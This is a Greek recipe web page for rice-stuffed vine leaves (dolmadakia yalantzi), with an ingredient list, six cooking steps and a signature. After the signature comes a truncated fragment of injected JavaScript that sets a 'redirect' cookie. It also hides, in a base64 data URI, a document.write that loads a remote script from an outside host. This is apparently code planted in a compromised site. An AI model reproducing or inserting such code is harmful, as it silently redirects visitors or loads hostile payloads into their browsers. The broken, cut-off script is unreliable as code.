Ντολμαδάκια Γιαλαντζί

Τι καλύτερο από τα παραδοσιακά μας ντολμαδάκια γιαλαντζί. Από τα ωραιότερα ορεκτικά!!! Τρώγονται πολύ ευχάριστα αυτή την εποχή και αποτελούν πολύ νόστιμα συνοδευτικά μεζεδάκια για το ουζάκι, τη μπυρίτσα και το κρασί σας.

Ακολουθήστε τη τσουχτροσυνταγή μας.

 

Υλικά

  • 300 γρ. φρέσκα αμπελόφυλλα
  • 1 1/2 κούπα ρύζι νυχάκι
  • 2 μέτρια κρεμμύδια ξερά
  • 3 φρέσκα κρεμμυδάκια
  • 4 κουταλιές άνηθο
  • 4 κουταλιές  μαϊντανό
  • 1 κουταλιά δυόσμο
  • 1/2 κούπα χυμό λεμονιού
  • 1/2 κούπα ελαιόλαδο
  • 3 κούπες νερό
  • αλάτι
  • πιπέρι

Παρασκευή

  1. Πλένετε τα αμπελόφυλλα και τα ζεματάτε σε βραστό νερό για 3 λεπτά.
  2. Ψιλοκόβετε τα ξερά κρεμμύδια και τα τσιγαρίζετε ελαφρά μέσα σε λίγο λάδι. Προσθέτετε  ψιλοκομμένα τα φρέσκα κρεμμυδάκια, το μαιντανό, τον άνηθο και το δύοσμό. Στη συνέχεια ρίχνετε το ρύζι από υπόλοιπο ελαιόλαδο, τη 1,5 κούπα νερό, λίγο από το χυμό λεμονιού και το αλατοπίπερο. Τα αφήνετε να βράσουν για περίπου 5 λεπτά (να απορροφηθεί το νερό).
  3. Παίρνετε ένα ένα αμπελόφυλλο με τη γυαλιστερή πλευρά προς τα κάτω, βάζετε ένα κουταλάκι από τη γέμιση, διπλώνετε δεξιά αριστερά τις άκρες προς τα μέσα και τυλίγετε σε ρολάκια. Τα τοπθετήτε σε κατσαρόλα το ένα δίπλα στο άλλο σφιχτά.
  4. Τέλος ρίχνετε λίγο αλατοπίπερο, το υπόλοιπο χυμό λεμονιού, το υπόλοιπο ελαιόλαδο και τα σκεπάζετε με ένα πιάτο. Συμπληρώνετε με το υπόλοιπο αλλά ζεστό νερό, ίσα να σκεπάσει ελαφρά το πιάτο και βάζετε την κατσαρόλα  σε χαμηλή προς μέτρια φωτιά. Σιγοβράζετε, σκεπασμένα για 15-20 περίπου λεπτά ελέγχοντας το νερό.
  5. Κατεβάζετε από τη φωτιά και τα αφήνετε να κρυώσουν
  6. Βγάζετε το πιάτο και τα τοποθετείτε σε πιατέλα. Σερβίρετε με λεμόνι και γιαούρτι.

 

Καλή σας όρεξη!

-Ρούλα Μος-
uot;));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

You may also like...

Leave a Reply